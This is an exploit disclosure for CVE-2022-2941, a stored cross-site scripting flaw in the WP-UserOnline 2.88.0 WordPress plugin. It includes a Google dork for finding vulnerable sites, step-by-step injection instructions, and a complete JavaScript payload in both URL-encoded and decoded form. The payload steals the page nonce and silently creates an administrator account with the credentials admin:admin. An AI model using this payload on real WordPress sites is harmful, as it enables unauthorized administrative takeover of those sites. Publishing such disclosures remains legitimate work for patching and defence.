WP-UserOnline 2.88.0 - Stored Cross Site Scripting (XSS) (Authenticated) - CVE-2022-2941

1. # Exploit Title: WP-UserOnline 2.88.0 - Stored Cross Site Scripting (XSS) (Authenticated)
2. # Google Dork: inurl:/wp-content/plugins/wp-useronline/
3. # Date: 2024-06-12
4. # Exploit Author: Onur Göğebakan
5. # Vendor Homepage: https://github.com/lesterchan/wp-useronline
6. # Software Link: https://downloads.wordpress.org/plugin/wp-useronline.2.88.0.zip
7. # Category: Web Application
8. # Version: 2.88.0
9. # Tested on: WordPress 6.5.4 - Windows 10
10. # CVE : CVE-2022-2941
11.  
12. # Explanation:
13. A new administrator user can be added to WordPress using a stored XSS vulnerability.
14.  
15.  
16. # Exploit:
17.   1. Visit http://poc.test/wp-admin/options-general.php?page=useronline-settings
18.   2. Click Save and intercept the request.
19.   3. Change `naming%5Bbots%5D` parameter value with belowed payload
20.   ```
21.     %3Cscript%3E+function+handleResponse%28%29+%7B+var+nonce+%3D+this.responseText.match%28%2Fname%3D%22_wpnonce_create-user%22+value%3D%22%28%5Cw%2B%29%22%2F%29%5B1%5D%3B+var+changeReq+%3D+new+XMLHttpRequest%28%29%3B+changeReq.open%28%27POST%27%2C%27%2Fwp-admin%2Fuser-new.php%27%2Ctrue%29%3B+changeReq.setRequestHeader%28%27Content-Type%27%2C%27application%2Fx-www-form-urlencoded%27%29%3B+var+params+%3D+%27action%3Dcreateuser%26_wpnonce_create-user%3D%27%2Bnonce%2B%27%26_wp_http_referer%3D%252Fwp-admin%252Fuser-new.php%27%2B%27%26user_login%3Dadmin%26email%3Dadmin%2540mail.com%26first_name%3D%26last_name%3D%26url%3D%26pass1%3Dadmin%26pass2%3Dadmin%26pw_weak%3Don%26role%3Dadministrator%26createuser%3DAdd%2BNew%2BUser%27%3B+changeReq.send%28params%29%3B+%7D+var+req+%3D+new+XMLHttpRequest%28%29%3B+req.onload+%3D+handleResponse%3B+req.open%28%27GET%27%2C+%27%2Fwp-admin%2Fuser-new.php%27%2C+true%29%3B+req.send%28%29%3B+%3C%2Fscript%3E
22.   ```
23.   4. Payload executed when user visited http://poc.test/wp-admin/index.php?page=useronline
24.   5. Administrator user added with admin:admin credentials.
25.  
26.  
27. # Decoded payload
28. ```
29. function handleResponse() {
30.     var nonce = this.responseText.match(/name="_wpnonce_create-user" value="(\w+)"/)[1];
31.     var changeReq = new XMLHttpRequest();
32.     changeReq.open('POST', '/wp-admin/user-new.php', true);
33.     changeReq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
34.     var params = 'action=createuser&_wpnonce_create-user=' + nonce +
35.         '&_wp_http_referer=%2Fwp-admin%2Fuser-new.php' +
36.         '&user_login=admin&email=admin%40mail.com&first_name=&last_name=&url=&pass1=admin&pass2=admin&pw_weak=on&role=administrator&createuser=Add+New+User';
37.     changeReq.send(params);
38. }
39.  
40. var req = new XMLHttpRequest();
41. req.onload = handleResponse;
42. req.open('GET', '/wp-admin/user-new.php', true);
43. req.send();
44. ```
45.